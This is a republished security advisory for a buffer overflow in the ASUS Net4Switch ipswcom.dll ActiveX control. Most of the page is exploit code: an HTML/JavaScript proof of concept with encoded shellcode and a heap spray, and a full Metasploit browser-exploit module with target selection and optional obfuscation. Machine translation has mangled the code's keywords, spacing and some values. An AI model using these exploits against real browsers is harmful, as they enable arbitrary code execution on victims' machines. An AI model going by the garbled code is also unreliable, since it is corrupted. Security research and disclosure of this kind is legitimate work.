ASUS Net4Switch 'ipswcom. dll 'ActiveX Remote Denial of Service Vulnerability

Source: Internet
Author: User

ASUS Net4Switch 'ipswcom. dll 'ActiveX Remote Denial of Service Vulnerability

Release date:
Updated on:

Affected Systems:
Asus Net4Switch ipswcom. dll 1.0.0.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52110

ASUS Net4Switch is the network management software on ASUS computers.

The ASUS Net4Switch ipswcom. dll component has a buffer overflow vulnerability. Remote attackers can execute arbitrary code through specially crafted html webpages.

<* Source: Dmitriy Evdokimov

Link: http://www.dsecrg.com/pages/vul/show.php? Id = 417
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Dmitriy Evdokimov () provides the following test methods:

<HTML>
<HEAD>
<TITLE> DSecRG: Asus exploit by EvdokimovDS </TITLE>
</HEAD>
<BODY>

<OBJECT id = 'vuln' classid = 'clsid: 1b9e86d8-7caf-46c8-9938-417b21e17a8e '> </object>
<SCRIPT>

Function Exploit ()
{

// Shellcode & #65533; exec notepad
Var shell = unescape ("% ue8fc % u0089 % u0000 % u8960 % u31e5 % u64d2 % u528b % u8b30 %
U0c52 % u528b % u8b14 % u2872 % ub70f % u264a % uff31 % uc031 % u3cac % u7c61
% U2c02 % uc120 % u0dcf % uc701 % uf0e2 % u5752 % u528b % u8b10 % u3c42 % ud00
1% u408b % u8578 % u74c0 % u014a % u50d0 % u488b % u8b18 % u2058 % ud301 % u3c
E3 % u8b49 % u8b34 % ud601 % uff31 % uc031 % uc1ac % u0dcf % uc701 % ue038 % uf
475% u7d03 % u3bf8 % u247d % ue275 % u8b58 % u2458 % ud301 % u8b66 % u4b0c % u
588b % u011c % u8bd3 % u8b04 % ud001 % u4489 % u2424 % u5b5b % u5961 % u515a %
Ue0ff % u5f58 % u8b5a % ueb12 % u5d86 % u016a % u858d % u00b9 % u0000 % u6850
% U8b31 % u876f % ud5ff % ue0bb % u2a1d % u680a % u95a6 % u9dbd % ud5ff % u063
C % u0a7c % ufb80 % u75e0 % ubb05 % u1347 % u6f72 % u006a % uff53 % u6ed5 % u74
6f % u7065 % u6461 % u0000 ");

// Heap-spray
Var bigbk = unescape ("% u9090 % u9090 % u9090 % u9090 ");
While (bigbk. Size <0x40000) bigbk = bigbk + bigbk;
Var mem = new Array ();
For (I = 0; I <400; I ++) mem [I] = bigbk + shell;

// Buffer overflow
Var bf = unescape ("% u0d0d % u0d0d ");
Var buf = "";
While (buf. length <8000) buf = buf + bf;

Vuln. Alert (buf );
}

Exploit ();
</SCRIPT>
</BODY>
</HTML>


##
# This file is part of the Metasploit Framework and may be subject
# Redistribution and specified cial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# Http://metasploit.com/framework/
##
Require 'msf/core'
Class Metasploit3 <Msf: Exploit: Remote
Rank = NormalRanking
Include Msf: Exploit: Remote: HttpServer: HTML
Def initialize (info = {})
Super (update_info (info,
'Name' => "ASUS Net4Switch ipswcom. dll ActiveX Stack Buffer Overflow ",
'Description' => % q {
This module exploits a vulnerability found in ASUS Net4Switch's ipswcom. dll
ActiveX control. A buffer overflow condition is possible in multiple places all
Because of the poor use of the cxdbuplint () function, which allows remote attackers
To gain arbitrary code execution under the context of the user.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Dmitriy Evdokimov ', # Initial discovery, poc
'Sinr3' # Metasploit
],
'References '=>
[
['Ossvdb', 'HTTP: // osvdb.org/show/osvdb/79438'],
['Url', 'HTTP: // dsecrg.com/pages/vul/show.php? Id = 417 ']
],
'Payload' =>
{
'Badchars' => "\ x00 ",
'Stackadjustment' =>-3500,
},
'Defaultopexception' =>
{
'Exitfunction' => "seh ",
'Initialautorunscript' => 'migrate-F ',
},
'Platform' => 'win ',
'Targets' =>
[
['Automic ', {}],
['Ie 6 on Windows XP SP3 ', {'max' => '0x40000', 'offset '=> '0x500'}],
['Ie 7 on Windows XP SP3 ', {'max' => '0x40000', 'offset '=> '0x500'}]
],
'Privileged' => false,
'Disclosuredate' => "Feb 17 2012 ",
'Defaulttarget' => 0 ))
Register_options (
[
OptBool. new ('obfuscate', [false, 'Enable JavaScript obfuscation'])
], Self. class)
End
Def get_target (agent)
Return target if target. name! = 'Automic'
If agent = ~ /NT 5 \. 1/and agent = ~ /MSIE 6/
Return targets [1] # IE 6 on Windows XP SP3
Elsif agent = ~ /NT 5 \. 1/and agent = ~ /MSIE 7/
Return targets [2] # IE 7 on Windows XP SP3
Else
Return nil
End
End
Def on_request_uri (cli, request)
Agent = request. headers ['user-agent']
My_target = get_target (agent)
If my_target.nil?
Print_error ("Browser not supported: # {agent. to_s }:#{ cli. peerhost }:# {cli. peerport }")
Send_not_found (cli)
Return
End
P = payload. encoded
Js_code = Rex: Text. to_unescape (p, Rex: Arch. endian (target. arch ))
Nops = Rex: Text. to_unescape (make_nops (4 ))
Spray = <-JS
Var heap_obj = new heapLib. ie (0x20000 );
Var code = unescape ("# {js_code }");
Var nops = unescape ("# {nops }");
While (nops. length <0x80000) nops + = nops;
Var offset = nops. substring (0, # {my_target ['offset']});
Var shellcode = offset + code + nops. substring (0, 0x800-code.length-offset.length );
While (shellcode. length <0x40000) shellcode + = shellcode;
Var block = shellcode. substring (0, (0x80000-6)/2 );
Heap_obj.gc ();
For (var I = 1; I <0x300; I ++ ){
Heap_obj.alloc (block );
}
JS
Spray = heaplib (spray, {: noobfu => true })
Js = <-JS
Var obj = new ActiveXObject ("ipswcom. IPSWComItf ");
# {Spray}
Function generate_padding (d, s ){
Var tmp = d;
While (tmp. length <s ){
Tmp + = tmp;
}
Var buf = tmp. substring (0, s/2 );
Tmp = null;
Return buf;
}
Var arg1 = generate_padding (unescape ("% u4141"), 4 );
Var arg2 = "A"; // Expands to 0x0041, helps us to align the stack
Arg2 + = generate_padding ("% u4343"), 2680 );
Arg2 + = unescape ("% u1_2 % u1_2 ");
Arg2 + = unescape ("% u0d0d % u0d0d ");
Arg2 + = generate_padding (unescape ("% u0d0d"), # {my_target ['max ']}-arg2.length );
Obj. MsgBox (arg1, arg2, 2 );
JS
# Obfuscate on demand
If datastore ['obscate']
Js =: Rex: Exploitation: JSObfu. new (js)
Js. obfuscate
End
Html = <-EOS
<Html>
<Head>
</Head>
<Body>
<Script>
# {Js}
</Script>
</Body>
</Html>
EOS
Html = html. gsub (/\ t /,'')
Print_status ("Sending html to # {cli. peerhost }:# {cli. peerport }...")
Send_response (cli, html, {'content-type' => 'text/html '})
End
End
= Begin
Download:
Http://www.softpedia.com/progDownload/ASUS-Net4Switch-Download-203619.html
Clsid: 1b9e86d8-7caf-46c8-9938-417b21e17a8e
C: \ Program Files \ ASUS \ Net4Switch \ ipswcom. dll
. Text: 10030523 push ecx
. Text: 10030524 mov eax, [ebp + arg_C]
. Text: 10030527 mov [ebp + var_4], eax
. Text: 1003052A cmp [ebp + var_4], 0
. Text: 1003052E jz short loc_10030541 <-- uType 10 h
. Text: 10030530 cmp [ebp + var_4], 1
. Text: 10030534 jz short loc_10030573 <-- uType 44 h
. Text: 10030536 cmp [ebp + var_4], 2
. Text: 1003053A jz short loc_100305A5 <-- cxdbuplint
...
. Text: 100305A5 loc_100305A5:; code xref: MsgBox + 1Aj
. Text: 100305A5 mov eax, [ebp + lpText]
. Text: 100305A8 push eax
. Text: 100305A9 push offset aIpsw_alertS; "[IPSW_alert] = % s"
. Text: 100305AE push 0FFh
. Text: 100305B3 call ds: cxdbuplint
= End

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Asus
----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.asus.com.tw

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.